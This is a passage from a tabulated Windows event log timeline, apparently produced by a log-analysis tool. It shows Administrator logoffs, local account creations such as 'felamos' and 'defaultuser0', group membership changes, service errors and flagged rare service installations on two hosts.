│ 2025-04-21 10:49:40 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4634     │ 737       │ DESKTOP-8IRBDLK │ TargetUserName: Administrator    │
│                     │                                     │       │ iting                          │          │           │                 │ LogonType: 3                     │
│                     │                                     │       │                                │          │           │                 │ TargetUserSid: S-1-5-21-387158   │
│                     │                                     │       │                                │          │           │                 │ 2759-1638593395-315824688-500    │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: DESKTOP-8IRB   │
│                     │                                     │       │                                │          │           │                 │ DLK                              │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0x2bbadd'        │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-04-21 10:49:40 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4634     │ 738       │ DESKTOP-8IRBDLK │ TargetUserName: Administrator    │
│                     │                                     │       │ iting                          │          │           │                 │ LogonType: 3                     │
│                     │                                     │       │                                │          │           │                 │ TargetUserSid: S-1-5-21-387158   │
│                     │                                     │       │                                │          │           │                 │ 2759-1638593395-315824688-500    │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: DESKTOP-8IRB   │
│                     │                                     │       │                                │          │           │                 │ DLK                              │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0x2afd1f'        │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-04-21 10:49:40 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4634     │ 739       │ DESKTOP-8IRBDLK │ TargetUserName: Administrator    │
│                     │                                     │       │ iting                          │          │           │                 │ LogonType: 3                     │
│                     │                                     │       │                                │          │           │                 │ TargetUserSid: S-1-5-21-387158   │
│                     │                                     │       │                                │          │           │                 │ 2759-1638593395-315824688-500    │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: DESKTOP-8IRB   │
│                     │                                     │       │                                │          │           │                 │ DLK                              │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0x2ca1bd'        │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-04-21 10:49:52 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4634     │ 749       │ DESKTOP-8IRBDLK │ TargetUserName: Administrator    │
│                     │                                     │       │ iting                          │          │           │                 │ LogonType: 3                     │
│                     │                                     │       │                                │          │           │                 │ TargetUserSid: S-1-5-21-387158   │
│                     │                                     │       │                                │          │           │                 │ 2759-1638593395-315824688-500    │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: DESKTOP-8IRB   │
│                     │                                     │       │                                │          │           │                 │ DLK                              │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0x2cc95c'        │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-04-21 10:49:54 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4634     │ 753       │ DESKTOP-8IRBDLK │ TargetUserName: Administrator    │
│                     │                                     │       │ iting                          │          │           │                 │ LogonType: 3                     │
│                     │                                     │       │                                │          │           │                 │ TargetUserSid: S-1-5-21-387158   │
│                     │                                     │       │                                │          │           │                 │ 2759-1638593395-315824688-500    │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: DESKTOP-8IRB   │
│                     │                                     │       │                                │          │           │                 │ DLK                              │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0x2ce514'        │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-04-21 10:49:57 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4634     │ 757       │ DESKTOP-8IRBDLK │ TargetUserName: Administrator    │
│                     │                                     │       │ iting                          │          │           │                 │ LogonType: 3                     │
│                     │                                     │       │                                │          │           │                 │ TargetUserSid: S-1-5-21-387158   │
│                     │                                     │       │                                │          │           │                 │ 2759-1638593395-315824688-500    │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: DESKTOP-8IRB   │
│                     │                                     │       │                                │          │           │                 │ DLK                              │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0x2cbfad'        │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-04-21 10:49:57 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4634     │ 758       │ DESKTOP-8IRBDLK │ TargetUserName: Administrator    │
│                     │                                     │       │ iting                          │          │           │                 │ LogonType: 3                     │
│                     │                                     │       │                                │          │           │                 │ TargetUserSid: S-1-5-21-387158   │
│                     │                                     │       │                                │          │           │                 │ 2759-1638593395-315824688-500    │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: DESKTOP-8IRB   │
│                     │                                     │       │                                │          │           │                 │ DLK                              │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0x27c849'        │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-04-21 10:49:57 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4634     │ 759       │ DESKTOP-8IRBDLK │ TargetUserName: Administrator    │
│                     │                                     │       │ iting                          │          │           │                 │ LogonType: 3                     │
│                     │                                     │       │                                │          │           │                 │ TargetUserSid: S-1-5-21-387158   │
│                     │                                     │       │                                │          │           │                 │ 2759-1638593395-315824688-500    │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: DESKTOP-8IRB   │
│                     │                                     │       │                                │          │           │                 │ DLK                              │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0x2999ce'        │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-04-21 10:50:07 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4634     │ 790       │ DESKTOP-8IRBDLK │ TargetUserName: Administrator    │
│                     │                                     │       │ iting                          │          │           │                 │ LogonType: 3                     │
│                     │                                     │       │                                │          │           │                 │ TargetUserSid: S-1-5-21-387158   │
│                     │                                     │       │                                │          │           │                 │ 2759-1638593395-315824688-500    │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: DESKTOP-8IRB   │
│                     │                                     │       │                                │          │           │                 │ DLK                              │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0x2d4f68'        │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-04-21 10:50:07 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4634     │ 791       │ DESKTOP-8IRBDLK │ TargetUserName: Administrator    │
│                     │                                     │       │ iting                          │          │           │                 │ LogonType: 3                     │
│                     │                                     │       │                                │          │           │                 │ TargetUserSid: S-1-5-21-387158   │
│                     │                                     │       │                                │          │           │                 │ 2759-1638593395-315824688-500    │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: DESKTOP-8IRB   │
│                     │                                     │       │                                │          │           │                 │ DLK                              │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0x2d793e'        │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-04-21 10:50:10 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4634     │ 795       │ DESKTOP-8IRBDLK │ TargetUserName: Administrator    │
│                     │                                     │       │ iting                          │          │           │                 │ LogonType: 3                     │
│                     │                                     │       │                                │          │           │                 │ TargetUserSid: S-1-5-21-387158   │
│                     │                                     │       │                                │          │           │                 │ 2759-1638593395-315824688-500    │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: DESKTOP-8IRB   │
│                     │                                     │       │                                │          │           │                 │ DLK                              │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0x2d03de'        │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-04-21 10:50:12 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4647     │ 796       │ DESKTOP-8IRBDLK │ TargetUserName: Administrator    │
│                     │                                     │       │ iting                          │          │           │                 │ TargetUserSid: S-1-5-21-387158   │
│                     │                                     │       │                                │          │           │                 │ 2759-1638593395-315824688-500    │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: DESKTOP-8IRB   │
│                     │                                     │       │                                │          │           │                 │ DLK                              │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0x1818e1'        │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-04-21 17:42:54 │ ‣ A Member Was Added to             │ 1     │ Microsoft-Windows-Security-Aud │ 4728     │ 42        │ WIN-CT4CCI7FTCO │ MemberName: '-'                  │
│                     │ a Security-Enabled Global           │       │ iting                          │          │           │                 │ MemberSid: S-1-5-21-3871582759   │
│                     │ Group                               │       │                                │          │           │                 │ -1638593395-315824688-504        │
│                     │                                     │       │                                │          │           │                 │ PrivilegeList: '-'               │
│                     │                                     │       │                                │          │           │                 │ SubjectDomainName: ''            │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: MINWINPC       │
│                     │                                     │       │                                │          │           │                 │ SubjectUserSid: S-1-5-18         │
│                     │                                     │       │                                │          │           │                 │ TargetUserName: None             │
│                     │                                     │       │                                │          │           │                 │ TargetSid: S-1-5-21-3871582759   │
│                     │                                     │       │                                │          │           │                 │ -1638593395-315824688-513        │
│                     │                                     │       │                                │          │           │                 │ SubjectLogonId: '0x3e7'          │
│                     │                                     │       │                                │          │           │                 │ SubjectUserName: MINWINPC$       │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-04-21 17:42:54 │ ‣ Local User Creation               │ 1     │ Microsoft-Windows-Security-Aud │ 4720     │ 43        │ WIN-CT4CCI7FTCO │ UserWorkstations: '%%1793'       │
│                     │                                     │       │ iting                          │          │           │                 │ PrivilegeList: '-'               │
│                     │                                     │       │                                │          │           │                 │ OldUacValue: '0x0'               │
│                     │                                     │       │                                │          │           │                 │ NewUacValue: '0x15'              │
│                     │                                     │       │                                │          │           │                 │ UserPrincipalName: '-'           │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: MINWINPC       │
│                     │                                     │       │                                │          │           │                 │ LogonHours: '%%1797'             │
│                     │                                     │       │                                │          │           │                 │ ScriptPath: '%%1793'             │
│                     │                                     │       │                                │          │           │                 │ PasswordLastSet: '%%1794'        │
│                     │                                     │       │                                │          │           │                 │ UserParameters: '%%1793'         │
│                     │                                     │       │                                │          │           │                 │ SubjectLogonId: '0x3e7'          │
│                     │                                     │       │                                │          │           │                 │ ProfilePath: '%%1793'            │
│                     │                                     │       │                                │          │           │                 │ AllowedToDelegateTo: '-'         │
│                     │                                     │       │                                │          │           │                 │ SubjectDomainName: ''            │
│                     │                                     │       │                                │          │           │                 │ HomePath: '%%1793'               │
│                     │                                     │       │                                │          │           │                 │ AccountExpires: '%%1794'         │
│                     │                                     │       │                                │          │           │                 │ SubjectUserSid: S-1-5-18         │
│                     │                                     │       │                                │          │           │                 │ DisplayName: '%%1793'            │
│                     │                                     │       │                                │          │           │                 │ HomeDirectory: '%%1793'          │
│                     │                                     │       │                                │          │           │                 │ TargetUserName: WDAGUtilityAcc   │
│                     │                                     │       │                                │          │           │                 │ ount                             │
│                     │                                     │       │                                │          │           │                 │ UserAccountControl: "\r\n\t\t%   │
│                     │                                     │       │                                │          │           │                 │ %2080\r\n\t\t%%2082\r\n\t\t%%2   │
│                     │                                     │       │                                │          │           │                 │ 084"                             │
│                     │                                     │       │                                │          │           │                 │ SidHistory: '-'                  │
│                     │                                     │       │                                │          │           │                 │ TargetSid: S-1-5-21-3871582759   │
│                     │                                     │       │                                │          │           │                 │ -1638593395-315824688-504        │
│                     │                                     │       │                                │          │           │                 │ SamAccountName: WDAGUtilityAcc   │
│                     │                                     │       │                                │          │           │                 │ ount                             │
│                     │                                     │       │                                │          │           │                 │ SubjectUserName: MINWINPC$       │
│                     │                                     │       │                                │          │           │                 │ PrimaryGroupId: '513'            │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-04-21 17:43:04 │ ‣ Windows Service Terminated        │ 1     │ Service Control Manager        │ 7023     │ 46        │ WIN-CT4CCI7FTCO │ Binary: 6E0065007400700072006F   │
│                     │ With Error                          │       │                                │          │           │                 │ 0066006D000000                   │
│                     │                                     │       │                                │          │           │                 │ param1: netprofm                 │
│                     │                                     │       │                                │          │           │                 │ param2: '%%21'                   │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-04-21 17:43:29 │ ‣ Rare Service Installations        │ 1     │                                │          │           │                 │                                  │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-04-21 17:44:52 │ ‣ Rare Service Installations        │ 1     │                                │          │           │                 │                                  │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-04-21 17:44:57 │ ‣ Rare Service Installations        │ 1     │                                │          │           │                 │                                  │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-04-21 17:44:58 │ ‣ Rare Service Installations        │ 1     │                                │          │           │                 │                                  │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-04-21 17:45:03 │ ‣ Rare Service Installations        │ 1     │                                │          │           │                 │                                  │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-04-21 17:45:04 │ ‣ Windows Service Terminated        │ 1     │ Service Control Manager        │ 7023     │ 206       │ WIN-CT4CCI7FTCO │ Binary: 6E0065007400700072006F   │
│                     │ With Error                          │       │                                │          │           │                 │ 0066006D000000                   │
│                     │                                     │       │                                │          │           │                 │ param1: Network List Service     │
│                     │                                     │       │                                │          │           │                 │ param2: '%%21'                   │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-04-21 17:45:07 │ ‣ Rare Service Installations        │ 1     │                                │          │           │                 │                                  │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-04-21 17:45:09 │ ‣ Rare Service Installations        │ 1     │                                │          │           │                 │                                  │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-04-21 17:45:09 │ ‣ Rare Service Installations        │ 1     │                                │          │           │                 │                                  │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-04-21 17:45:13 │ ‣ Rare Service Installations        │ 1     │                                │          │           │                 │                                  │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-04-21 17:45:13 │ ‣ Rare Service Installations        │ 1     │                                │          │           │                 │                                  │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-04-21 17:45:13 │ ‣ Rare Service Installations        │ 1     │                                │          │           │                 │                                  │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-04-21 17:45:13 │ ‣ Rare Service Installations        │ 1     │                                │          │           │                 │                                  │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-04-21 17:45:13 │ ‣ Rare Service Installations        │ 1     │                                │          │           │                 │                                  │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-04-21 17:45:15 │ ‣ Rare Service Installations        │ 1     │                                │          │           │                 │                                  │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-04-21 17:46:03 │ ‣ A Member Was Added to             │ 1     │ Microsoft-Windows-Security-Aud │ 4728     │ 245       │ DESKTOP-8IRBDLK │ MemberName: '-'                  │
│                     │ a Security-Enabled Global           │       │ iting                          │          │           │                 │ MemberSid: S-1-5-21-3871582759   │
│                     │ Group                               │       │                                │          │           │                 │ -1638593395-315824688-1000       │
│                     │                                     │       │                                │          │           │                 │ PrivilegeList: '-'               │
│                     │                                     │       │                                │          │           │                 │ SubjectDomainName: WORKGROUP     │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: WIN-CT4CCI7F   │
│                     │                                     │       │                                │          │           │                 │ TCO                              │
│                     │                                     │       │                                │          │           │                 │ SubjectUserSid: S-1-5-18         │
│                     │                                     │       │                                │          │           │                 │ TargetUserName: None             │
│                     │                                     │       │                                │          │           │                 │ TargetSid: S-1-5-21-3871582759   │
│                     │                                     │       │                                │          │           │                 │ -1638593395-315824688-513        │
│                     │                                     │       │                                │          │           │                 │ SubjectLogonId: '0x3e7'          │
│                     │                                     │       │                                │          │           │                 │ SubjectUserName: WIN-CT4CCI7FT   │
│                     │                                     │       │                                │          │           │                 │ CO$                              │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-04-21 17:46:03 │ ‣ Local User Creation               │ 1     │ Microsoft-Windows-Security-Aud │ 4720     │ 246       │ DESKTOP-8IRBDLK │ UserWorkstations: '%%1793'       │
│                     │                                     │       │ iting                          │          │           │                 │ PrivilegeList: '-'               │
│                     │                                     │       │                                │          │           │                 │ OldUacValue: '0x0'               │
│                     │                                     │       │                                │          │           │                 │ NewUacValue: '0x15'              │
│                     │                                     │       │                                │          │           │                 │ UserPrincipalName: '-'           │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: WIN-CT4CCI7F   │
│                     │                                     │       │                                │          │           │                 │ TCO                              │
│                     │                                     │       │                                │          │           │                 │ LogonHours: '%%1797'             │
│                     │                                     │       │                                │          │           │                 │ ScriptPath: '%%1793'             │
│                     │                                     │       │                                │          │           │                 │ PasswordLastSet: '%%1794'        │
│                     │                                     │       │                                │          │           │                 │ UserParameters: '%%1793'         │
│                     │                                     │       │                                │          │           │                 │ SubjectLogonId: '0x3e7'          │
│                     │                                     │       │                                │          │           │                 │ ProfilePath: '%%1793'            │
│                     │                                     │       │                                │          │           │                 │ AllowedToDelegateTo: '-'         │
│                     │                                     │       │                                │          │           │                 │ SubjectDomainName: WORKGROUP     │
│                     │                                     │       │                                │          │           │                 │ HomePath: '%%1793'               │
│                     │                                     │       │                                │          │           │                 │ AccountExpires: '%%1794'         │
│                     │                                     │       │                                │          │           │                 │ SubjectUserSid: S-1-5-18         │
│                     │                                     │       │                                │          │           │                 │ DisplayName: '%%1793'            │
│                     │                                     │       │                                │          │           │                 │ HomeDirectory: '%%1793'          │
│                     │                                     │       │                                │          │           │                 │ TargetUserName: felamos          │
│                     │                                     │       │                                │          │           │                 │ UserAccountControl: "\r\n\t\t%   │
│                     │                                     │       │                                │          │           │                 │ %2080\r\n\t\t%%2082\r\n\t\t%%2   │
│                     │                                     │       │                                │          │           │                 │ 084"                             │
│                     │                                     │       │                                │          │           │                 │ SidHistory: '-'                  │
│                     │                                     │       │                                │          │           │                 │ TargetSid: S-1-5-21-3871582759   │
│                     │                                     │       │                                │          │           │                 │ -1638593395-315824688-1000       │
│                     │                                     │       │                                │          │           │                 │ SamAccountName: felamos          │
│                     │                                     │       │                                │          │           │                 │ SubjectUserName: WIN-CT4CCI7FT   │
│                     │                                     │       │                                │          │           │                 │ CO$                              │
│                     │                                     │       │                                │          │           │                 │ PrimaryGroupId: '513'            │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-04-21 17:46:05 │ ‣ A Member Was Added to             │ 1     │ Microsoft-Windows-Security-Aud │ 4728     │ 267       │ DESKTOP-8IRBDLK │ MemberName: '-'                  │
│                     │ a Security-Enabled Global           │       │ iting                          │          │           │                 │ MemberSid: S-1-5-21-3871582759   │
│                     │ Group                               │       │                                │          │           │                 │ -1638593395-315824688-1001       │
│                     │                                     │       │                                │          │           │                 │ PrivilegeList: '-'               │
│                     │                                     │       │                                │          │           │                 │ SubjectDomainName: WORKGROUP     │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: DESKTOP-8IRB   │
│                     │                                     │       │                                │          │           │                 │ DLK                              │
│                     │                                     │       │                                │          │           │                 │ SubjectUserSid: S-1-5-18         │
│                     │                                     │       │                                │          │           │                 │ TargetUserName: None             │
│                     │                                     │       │                                │          │           │                 │ TargetSid: S-1-5-21-3871582759   │
│                     │                                     │       │                                │          │           │                 │ -1638593395-315824688-513        │
│                     │                                     │       │                                │          │           │                 │ SubjectLogonId: '0x3e7'          │
│                     │                                     │       │                                │          │           │                 │ SubjectUserName: WIN-CT4CCI7FT   │
│                     │                                     │       │                                │          │           │                 │ CO$                              │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-04-21 17:46:05 │ ‣ Local User Creation               │ 1     │ Microsoft-Windows-Security-Aud │ 4720     │ 268       │ DESKTOP-8IRBDLK │ UserWorkstations: '%%1793'       │
│                     │                                     │       │ iting                          │          │           │                 │ PrivilegeList: '-'               │
│                     │                                     │       │                                │          │           │                 │ OldUacValue: '0x0'               │
│                     │                                     │       │                                │          │           │                 │ NewUacValue: '0x15'              │
│                     │                                     │       │                                │          │           │                 │ UserPrincipalName: '-'           │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: DESKTOP-8IRB   │
│                     │                                     │       │                                │          │           │                 │ DLK                              │
│                     │                                     │       │                                │          │           │                 │ LogonHours: '%%1797'             │
│                     │                                     │       │                                │          │           │                 │ ScriptPath: '%%1793'             │
│                     │                                     │       │                                │          │           │                 │ PasswordLastSet: '%%1794'        │
│                     │                                     │       │                                │          │           │                 │ UserParameters: '%%1793'         │
│                     │                                     │       │                                │          │           │                 │ SubjectLogonId: '0x3e7'          │
│                     │                                     │       │                                │          │           │                 │ ProfilePath: '%%1793'            │
│                     │                                     │       │                                │          │           │                 │ AllowedToDelegateTo: '-'         │
│                     │                                     │       │                                │          │           │                 │ SubjectDomainName: WORKGROUP     │
│                     │                                     │       │                                │          │           │                 │ HomePath: '%%1793'               │
│                     │                                     │       │                                │          │           │                 │ AccountExpires: '%%1794'         │
│                     │                                     │       │                                │          │           │                 │ SubjectUserSid: S-1-5-18         │
│                     │                                     │       │                                │          │           │                 │ DisplayName: '%%1793'            │
│                     │                                     │       │                                │          │           │                 │ HomeDirectory: '%%1793'          │
│                     │                                     │       │                                │          │           │                 │ TargetUserName: defaultuser0     │
│                     │                                     │       │                                │          │           │                 │ UserAccountControl: "\r\n\t\t%   │
│                     │                                     │       │                                │          │           │                 │ %2080\r\n\t\t%%2082\r\n\t\t%%2   │
│                     │                                     │       │                                │          │           │                 │ 084"                             │
│                     │                                     │       │                                │          │           │                 │ SidHistory: '-'                  │
│                     │                                     │       │                                │          │           │                 │ TargetSid: S-1-5-21-3871582759   │
│                     │                                     │       │                                │          │           │                 │ -1638593395-315824688-1001       │
│                     │                                     │       │                                │          │           │                 │ SamAccountName: defaultuser0     │
│                     │                                     │       │                                │          │           │                 │ SubjectUserName: WIN-CT4CCI7FT   │
│                     │                                     │       │                                │          │           │                 │ CO$                              │
│                     │                                     │       │                                │          │           │                 │ PrimaryGroupId: '513'            │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-14 16:28:24 │ ‣ Windows Service Terminated        │ 1     │ Service Control Manager        │ 7023     │ 407       │ DESKTOP-8IRBDLK │ Binary: '460044005200650073005   │
│                     │ With Error                          │       │                                │          │           │                 │ 000750062000000'                 │
│                     │                                     │       │                                │          │           │                 │ param1: FDResPub                 │
│                     │                                     │       │                                │          │           │                 │ param2: '%%2147952449'           │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-14 16:29:49 │ ‣ A Member Was Removed              │ 1     │ Microsoft-Windows-Security-Aud │ 4729     │ 1087      │ DESKTOP-8IRBDLK │ MemberName: '-'                  │
│                     │ From a Security-Enabled             │       │ iting                          │          │           │                 │ MemberSid: S-1-5-21-3871582759   │
│                     │ Global Group                        │       │                                │          │           │                 │ -1638593395-315824688-1001       │
│                     │                                     │       │                                │          │           │                 │ PrivilegeList: '-'               │
│                     │                                     │       │                                │          │           │                 │ SubjectDomainName: DESKTOP-8IR   │
│                     │                                     │       │                                │          │           │                 │ BDLK                             │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: DESKTOP-8IRB   │
│                     │                                     │       │                                │          │           │                 │ DLK                              │
│                     │                                     │       │                                │          │           │                 │ SubjectUserSid: S-1-5-21-38715   │
│                     │                                     │       │                                │          │           │                 │ 82759-1638593395-315824688-500   │
│                     │                                     │       │                                │          │           │                 │ TargetUserName: None             │
│                     │                                     │       │                                │          │           │                 │ TargetSid: S-1-5-21-3871582759   │
│                     │                                     │       │                                │          │           │                 │ -1638593395-315824688-513        │
│                     │                                     │       │                                │          │           │                 │ SubjectLogonId: '0x9a5d2'        │
│                     │                                     │       │                                │          │           │                 │ SubjectUserName: Administrator   │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-14 16:38:49 │ ‣ User Logoff Event                 │ 1     │ Microsoft-Windows-Security-Aud │ 4647     │ 1572      │ DESKTOP-8IRBDLK │ TargetUserName: Administrator    │
│                     │                                     │       │ iting                          │          │           │                 │ TargetUserSid: S-1-5-21-387158   │
│                     │                                     │       │                                │          │           │                 │ 2759-1638593395-315824688-500    │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: DESKTOP-8IRB   │
│                     │                                     │       │                                │          │           │                 │ DLK                              │
│                     │                                     │       │                                │          │           │                 │ TargetLogonId: '0x9a5d2'         │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-15 21:04:43 │ ‣ Rare Service Installations        │ 1     │                                │          │           │                 │                                  │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-15 21:10:59 │ ‣ A Member Was Added to             │ 1     │ Microsoft-Windows-Security-Aud │ 4728     │ 1849      │ DESKTOP-8IRBDLK │ MemberName: '-'                  │
│                     │ a Security-Enabled Global           │       │ iting                          │          │           │                 │ MemberSid: S-1-5-21-3871582759   │
│                     │ Group                               │       │                                │          │           │                 │ -1638593395-315824688-1002       │
│                     │                                     │       │                                │          │           │                 │ PrivilegeList: '-'               │
│                     │                                     │       │                                │          │           │                 │ SubjectDomainName: DESKTOP-8IR   │
│                     │                                     │       │                                │          │           │                 │ BDLK                             │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: DESKTOP-8IRB   │
│                     │                                     │       │                                │          │           │                 │ DLK                              │
│                     │                                     │       │                                │          │           │                 │ SubjectUserSid: S-1-5-21-38715   │
│                     │                                     │       │                                │          │           │                 │ 82759-1638593395-315824688-500   │
│                     │                                     │       │                                │          │           │                 │ TargetUserName: None             │
│                     │                                     │       │                                │          │           │                 │ TargetSid: S-1-5-21-3871582759   │
│                     │                                     │       │                                │          │           │                 │ -1638593395-315824688-513        │
│                     │                                     │       │                                │          │           │                 │ SubjectLogonId: '0x725da'        │
│                     │                                     │       │                                │          │           │                 │ SubjectUserName: Administrator   │
├─────────────────────┼─────────────────────────────────────┼───────┼────────────────────────────────┼──────────┼───────────┼─────────────────┼──────────────────────────────────┤
│ 2025-08-15 21:10:59 │ ‣ Local User Creation               │ 1     │ Microsoft-Windows-Security-Aud │ 4720     │ 1850      │ DESKTOP-8IRBDLK │ UserWorkstations: '%%1793'       │
│                     │                                     │       │ iting                          │          │           │                 │ PrivilegeList: '-'               │
│                     │                                     │       │                                │          │           │                 │ OldUacValue: '0x0'               │
│                     │                                     │       │                                │          │           │                 │ NewUacValue: '0x15'              │
│                     │                                     │       │                                │          │           │                 │ UserPrincipalName: '-'           │
│                     │                                     │       │                                │          │           │                 │ TargetDomainName: DESKTOP-8IRB   │
│                     │                                     │       │                                │          │           │                 │ DLK                              │
│                     │                                     │       │                                │          │           │                 │ LogonHours: '%%1797'             │
